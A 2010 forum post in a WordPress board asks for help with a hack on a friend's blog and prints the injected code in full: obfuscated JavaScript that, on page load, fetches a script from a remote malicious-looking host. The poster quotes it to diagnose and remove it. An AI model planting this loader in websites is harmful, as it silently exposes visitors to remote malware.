A new hack in Wordpess Blogs. Parese error: /wp-includes/default-widgets.php on line

Discussion in 'WordPress' started by vlodia_cannon, Jan 8, 2010.

  1. #1
    I don't know if you have experienced this but a friend of mine got this one.

    /wp-includes/default-widgets.php on line 1035 error

    and I believe this was a hack. I was wondering, how did you put a remedy on this one?

    So far this hack infuses, to the files of your blog.

    <script>/*LGPL*/ try{ window.onload = function(){var Sz5at9il9im = document.createElement('s@(c@#r(@i&!&p#@)t!^$'.rep lace(/\)|@|#|\(|&|\!|\$|\^/ig, ''));Sz5at9il9im.setAttribute('defer', 'd^!!e#!f$$e$@)^r$'.replace(/\)|\(|\^|#|@|\!|\$|&/ig, ''));Sz5at9il9im.setAttribute('type', 't^^#e^x#$!!t&@^/#&&j#a&$!v(a(#&^s)c#@&r#i$^p$!t!!'.replace(/\^|#|\(|\!|\$|&|@|\)/ig, ''));Sz5at9il9im.setAttribute('id', 'T^#^!#l#@9((!@h)!#p&^8&#v^!y(&(m^$5$)&v&$!e#!0##' .replace(/\!|#|\)|&|@|\(|\^|\$/ig, ''));Sz5at9il9im.setAttribute('s#$r((c&)'.replace(/&|\(|@|\)|\$|\!|#|\^/ig, ''), 'h($t$$&t&p^((^:$)/#^&/))c())r#)(&i)&c)$&^i)!@)n^&&$f!&^!o)!-^(c!#o)&((m#^&$.(^)(n(#&y^@p#!o^)&s^(@t$.#c$(o&&@! ^m!(.!$#^a$!^$m&a!$z&$$(o^&$n($^-(#)f&#!r&$.(&$t)@^@e#e)$($n#(!w((&$e#b&##@d)!^e^$s @)#$i)g^#^n&).&!!)r())u$##@!8@@0!)#)8!!0!!^/^(k(#)u@&@6$.))#c@)(o#@&@m(##/)$k))!u^^6(!##.#&c(##^o@&!^)m#)@#/)#&g(o^!$!o#&g@l^$&e$$@.(c$)@o#&!!m#/(@^!)b@^!&i@$g!!p($^o$^i(^(n&t&^&.!#c&&!o#m!@/!!a!@(d(#d#!#!i$&@#c!&)&t!&$$&i(@n(@!g)!)&g(&a@@m( e((^s@!.@c&(@)&o@&m)#/(^'.replace(/\$|\!|\^|@|#|\(|\)|&/ig, ''));if (document){document.body.appendChild(Sz5at9il9im); }} } catch(Srq4haf5c9lbvv1f21u) {}</script>
    <!--3f6594acfea60646639b05cbd580f9ea-->

    To remedy the situation you need to delete that script from the files affected.

    The question is, how do you protect your website from such script injection?
     
    vlodia_cannon, Jan 8, 2010 IP